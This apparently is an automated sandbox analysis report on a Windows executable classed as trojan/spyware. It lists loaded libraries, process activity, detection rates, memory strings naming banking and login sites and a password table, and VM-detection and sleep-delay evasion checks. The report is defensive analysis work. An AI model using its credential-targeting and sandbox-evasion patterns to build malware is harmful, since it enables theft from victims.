                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017BB700_2_0017BB70
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001973900_2_00197390
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001764100_2_00176410
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018AC200_2_0018AC20
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001874200_2_00187420
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00186C500_2_00186C50
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00179C400_2_00179C40
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001864400_2_00186440
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00175C900_2_00175C90
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017A4800_2_0017A480
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017C4F00_2_0017C4F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018BCF00_2_0018BCF0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001725000_2_00172500
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001AB5320_2_001AB532
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017AD700_2_0017AD70
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001735600_2_00173560
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017E5D00_2_0017E5D0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00172DE00_2_00172DE0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018B6000_2_0018B600
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00189E500_2_00189E50
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017FE400_2_0017FE40
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00182E400_2_00182E40
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001756700_2_00175670
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00187E700_2_00187E70
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0019E6890_2_0019E689
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00177E800_2_00177E80
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001826B00_2_001826B0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018DEA00_2_0018DEA0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001766F00_2_001766F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00176F000_2_00176F00
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018A7200_2_0018A720
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001727500_2_00172750
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001847400_2_00184740
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00195F910_2_00195F91
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001787800_2_00178780
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017BFB00_2_0017BFB0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00185FA00_2_00185FA0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018CFF00_2_0018CFF0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_033CE9433_3_033CE943
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_033CEC793_3_033CEC79
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: String function: 001912C0 appears 52 times
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304
                Source: 1fxm3u0d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 1fxm3u0d.exeStatic PE information: Section: .right ZLIB complexity 1.0003399527914614
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@11/2
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2584:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4368
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6cf7f9bd-0edb-4191-a81e-0925af280bf6Jump to behavior
                Source: 1fxm3u0d.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\1fxm3u0d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 1fxm3u0d.exe, 00000003.00000003.2193488612.0000000005A75000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2230939158.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1fxm3u0d.exeVirustotal: Detection: 57%
                Source: 1fxm3u0d.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile read: C:\Users\user\Desktop\1fxm3u0d.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: 1fxm3u0d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: 1fxm3u0d.exeStatic PE information: section name: .right
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00173D40 push eax; ret 0_2_00173FA5
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0019147A push ecx; ret 0_2_0019148D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_034271EA push ecx; retf 3_3_03427210
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03423D39 push 00000054h; retf 3_3_03423D5D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 3_3_03428AD9 push cs; ret 3_3_03428ADA
                Source: 1fxm3u0d.exeStatic PE information: section name: .text entropy: 6.952656508969145
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00191810 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00191810
                Source: C:\Users\user\Desktop\1fxm3u0d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\1fxm3u0d.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exe TID: 6604Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exe TID: 1480Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A5898 FindFirstFileExW,0_2_001A5898
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A5949 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_001A5949
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231439928.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: 1fxm3u0d.exe, 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280589839.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231439928.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
